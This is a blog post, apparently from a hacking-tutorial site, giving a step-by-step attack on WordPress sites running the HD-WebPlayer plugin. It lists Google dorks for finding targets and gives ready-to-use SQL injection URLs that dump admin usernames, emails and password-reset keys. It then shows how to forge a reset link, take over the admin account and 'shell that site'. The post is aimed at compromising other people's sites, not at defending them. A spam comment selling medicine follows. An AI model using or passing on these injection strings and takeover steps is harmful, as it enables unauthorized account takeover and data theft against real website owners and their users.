Hello , After Writing Top 3 Premium Blogger Templates For Free
I was searching for some WordPress Exploits So I Found This Sql Injection Vulnerability In a Plugin Named HD-WebPlayer So now what is the Loop Hole ?
Lets Begin your First Step Is As Always to Find Vulnerable Site Using Google Dorks

For This Exploit Their are 3 Special Dorks : 


Dork #1(config.php)

inurl:"/wp-content/plugins/hd-webplayer/config.php?id="Dork #2 (playlist.php)inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="Dork #3 (General):inurl:"/wp-content/plugins/hd-webplayer/"

Use Google Dork To Find Vulnerable Site Like this : 

Now You Found The Site So Lets Try To Inject It .
For Example : 
http://Site.com/wp-content/plugins/hd-webplayer/config.php?id=2
So Replace It With 

http://Site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--You Have To Add Below Url After Site.Com :
wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now When you Replace That Url Website Must Show this Check What I Have Replaced i Commanded Database To Fetch User_login & User_email From Users Table , I Am Not Explaining you SQLi , I will make a tutorial Wait For My Tutorial Or Google About It , So Now Go To Admin Panel Login Page By typing http://Site.com/wp-login.php Or
http://Site.com/wp-admin
And Click On Lost Your Password ?
After That Either Write Username Or Email Which You Got In Previous Step And Click Enter , Now Again U Have To Get The Authorization Code Which Has Been Sent To Admin's Email now Again U Have To Inject Now Add Below Code After Site Url Like http://Site.Com/







http://www.Site.Com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
It will Show The Data Of Authorization Code Now U Have To Make Custom Url For Resetting Password Now For Resetting Add This Url After http://Site.com/


wp-login.php?action=rp&key=YOUR_RESET_KEY&login=USERNAME
Now Replace YOUR_RESET_KEY With Authorization Key & USERNAME with Username As I Selected Admin Now It will Ask You To Change Password :) Login To Dashboard And Shell That Site .

Any Problem ? Comment Below Or Email Us At Contact@eHowTutorials.net

Post a Comment Blogger

  1. Cara Mengobati Sipilis Dengan Kumis Kucing ? Segera Hubungi Kami Dan Pesan Obatnya Sekarang Juga di Fast Respond : 087705015423 PIN : 207C6F18.

    ReplyDelete

 
Top